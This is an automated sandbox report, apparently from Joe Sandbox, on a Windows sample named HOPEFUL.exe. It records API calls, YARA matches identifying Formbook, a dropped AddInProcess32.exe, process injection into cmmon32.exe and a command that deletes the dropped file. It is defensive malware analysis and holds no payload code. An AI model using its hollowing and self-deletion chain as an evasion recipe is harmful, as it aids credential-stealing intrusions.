Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018599A0 NtCreateSection,LdrInitializeThunk,	5_2_018599A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018595D0 NtClose,LdrInitializeThunk,	5_2_018595D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01859910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859540 NtReadFile,LdrInitializeThunk,	5_2_01859540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018598F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_018598F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859840 NtDelayExecution,LdrInitializeThunk,	5_2_01859840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01859860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859780 NtMapViewOfSection,LdrInitializeThunk,	5_2_01859780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018597A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_018597A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859710 NtQueryInformationToken,LdrInitializeThunk,	5_2_01859710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018596E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_018596E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01859A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859A20 NtResumeThread,LdrInitializeThunk,	5_2_01859A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859A50 NtCreateFile,LdrInitializeThunk,	5_2_01859A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01859660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018599D0 NtCreateProcessEx,	5_2_018599D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018595F0 NtQueryInformationFile,	5_2_018595F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859520 NtWaitForSingleObject,	5_2_01859520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185AD30 NtSetContextThread,	5_2_0185AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859950 NtQueueApcThread,	5_2_01859950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859560 NtWriteFile,	5_2_01859560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018598A0 NtWriteVirtualMemory,	5_2_018598A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859820 NtEnumerateKey,	5_2_01859820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185B040 NtSuspendThread,	5_2_0185B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185A3B0 NtGetContextThread,	5_2_0185A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859FE0 NtCreateMutant,	5_2_01859FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859B00 NtSetValueKey,	5_2_01859B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185A710 NtOpenProcessToken,	5_2_0185A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859730 NtQueryVirtualMemory,	5_2_01859730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859760 NtOpenProcess,	5_2_01859760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859770 NtSetInformationFile,	5_2_01859770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185A770 NtOpenThread,	5_2_0185A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859A80 NtOpenDirectoryObject,	5_2_01859A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018596D0 NtCreateKey,	5_2_018596D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859610 NtEnumerateValueKey,	5_2_01859610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859A10 NtQuerySection,	5_2_01859A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859650 NtQueryValueKey,	5_2_01859650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01859670 NtQueryInformationProcess,	5_2_01859670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29860 NtQuerySystemInformation,LdrInitializeThunk,	19_2_04E29860
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29840 NtDelayExecution,LdrInitializeThunk,	19_2_04E29840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E295D0 NtClose,LdrInitializeThunk,	19_2_04E295D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E299A0 NtCreateSection,LdrInitializeThunk,	19_2_04E299A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29540 NtReadFile,LdrInitializeThunk,	19_2_04E29540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29910 NtAdjustPrivilegesToken,LdrInitializeThunk,	19_2_04E29910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E296E0 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_04E296E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E296D0 NtCreateKey,LdrInitializeThunk,	19_2_04E296D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29660 NtAllocateVirtualMemory,LdrInitializeThunk,	19_2_04E29660
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29650 NtQueryValueKey,LdrInitializeThunk,	19_2_04E29650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29A50 NtCreateFile,LdrInitializeThunk,	19_2_04E29A50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29FE0 NtCreateMutant,LdrInitializeThunk,	19_2_04E29FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29780 NtMapViewOfSection,LdrInitializeThunk,	19_2_04E29780
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29710 NtQueryInformationToken,LdrInitializeThunk,	19_2_04E29710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E298F0 NtReadVirtualMemory,	19_2_04E298F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E298A0 NtWriteVirtualMemory,	19_2_04E298A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2B040 NtSuspendThread,	19_2_04E2B040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29820 NtEnumerateKey,	19_2_04E29820
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E295F0 NtQueryInformationFile,	19_2_04E295F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E299D0 NtCreateProcessEx,	19_2_04E299D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29560 NtWriteFile,	19_2_04E29560
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29950 NtQueueApcThread,	19_2_04E29950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29520 NtWaitForSingleObject,	19_2_04E29520
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2AD30 NtSetContextThread,	19_2_04E2AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29A80 NtOpenDirectoryObject,	19_2_04E29A80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29670 NtQueryInformationProcess,	19_2_04E29670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29A20 NtResumeThread,	19_2_04E29A20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29A00 NtProtectVirtualMemory,	19_2_04E29A00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29610 NtEnumerateValueKey,	19_2_04E29610
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29A10 NtQuerySection,	19_2_04E29A10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E297A0 NtUnmapViewOfSection,	19_2_04E297A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2A3B0 NtGetContextThread,	19_2_04E2A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29760 NtOpenProcess,	19_2_04E29760
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29770 NtSetInformationFile,	19_2_04E29770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2A770 NtOpenThread,	19_2_04E2A770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29730 NtQueryVirtualMemory,	19_2_04E29730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E29B00 NtSetValueKey,	19_2_04E29B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E2A710 NtOpenProcessToken,	19_2_04E2A710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9D60 NtCreateFile,	19_2_00ED9D60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9E90 NtClose,	19_2_00ED9E90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9E10 NtReadFile,	19_2_00ED9E10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9F40 NtAllocateVirtualMemory,	19_2_00ED9F40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9D5D NtCreateFile,	19_2_00ED9D5D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9E8A NtClose,	19_2_00ED9E8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9E0B NtReadFile,	19_2_00ED9E0B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00ED9F3A NtAllocateVirtualMemory,	19_2_00ED9F3A

Source: C:\Users\user\Desktop\HOPEFUL.exe

Code function: 0_2_02F1359C CreateProcessAsUserW,

0_2_02F1359C

Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F11898	0_2_02F11898
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F11168	0_2_02F11168
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F048A2	0_2_02F048A2
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F063AB	0_2_02F063AB
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F12E78	0_2_02F12E78
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F12A00	0_2_02F12A00
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_016499C1	0_2_016499C1
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164BBE8	0_2_0164BBE8
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164A4B9	0_2_0164A4B9
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_01643F90	0_2_01643F90
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164F618	0_2_0164F618
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164EE1A	0_2_0164EE1A
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164D6AA	0_2_0164D6AA
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_016476B0	0_2_016476B0
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_0164F608	0_2_0164F608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041D8D2	5_2_0041D8D2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041E197	5_2_0041E197
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041D313	5_2_0041D313
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041D63C	5_2_0041D63C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00409E3F	5_2_00409E3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041DF97	5_2_0041DF97
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041DFAA	5_2_0041DFAA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00DE2050	5_2_00DE2050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842581	5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E25DD	5_2_018E25DD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182D5E0	5_2_0182D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181F900	5_2_0181F900
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E2D07	5_2_018E2D07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01810D20	5_2_01810D20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E1D55	5_2_018E1D55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182B090	5_2_0182B090
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E20A8	5_2_018E20A8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E28EC	5_2_018E28EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1002	5_2_018D1002
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182841F	5_2_0182841F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184EBB0	5_2_0184EBB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DDBD2	5_2_018DDBD2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E1FF1	5_2_018E1FF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E2B28	5_2_018E2B28
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E22AE	5_2_018E22AE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E2EF7	5_2_018E2EF7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01836E30	5_2_01836E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFB090	19_2_04DFB090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF841F	19_2_04DF841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA1002	19_2_04EA1002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DFD5E0	19_2_04DFD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E12581	19_2_04E12581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB1D55	19_2_04EB1D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E04120	19_2_04E04120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DEF900	19_2_04DEF900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE0D20	19_2_04DE0D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E06E30	19_2_04E06E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1EBB0	19_2_04E1EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDE197	19_2_00EDE197
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EC2D87	19_2_00EC2D87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EC2D90	19_2_00EC2D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EC9E40	19_2_00EC9E40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EC9E3F	19_2_00EC9E3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDDFAA	19_2_00EDDFAA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EC2FB0	19_2_00EC2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDDF97	19_2_00EDDF97

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0181B150 appears 35 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 04DEB150 appears 32 times

Source: HOPEFUL.exe	Binary or memory string: OriginalFilename vs HOPEFUL.exe
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSHCore1.dll0 vs HOPEFUL.exe
Source: HOPEFUL.exe, 00000000.00000002.296333169.0000000003121000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPe6.dll" vs HOPEFUL.exe
Source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAddInProcess32.exeT vs HOPEFUL.exe

Source: HOPEFUL.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/2@4/3

Source: C:\Users\user\Desktop\HOPEFUL.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HOPEFUL.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01

Source: C:\Users\user\Desktop\HOPEFUL.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to behavior

Source: HOPEFUL.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HOPEFUL.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: HOPEFUL.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\HOPEFUL.exe 'C:\Users\user\Desktop\HOPEFUL.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: HOPEFUL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: HOPEFUL.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: HOPEFUL.exe

Static file information: File size 3437056 > 1048576

Source: HOPEFUL.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x346600

Source: HOPEFUL.exe

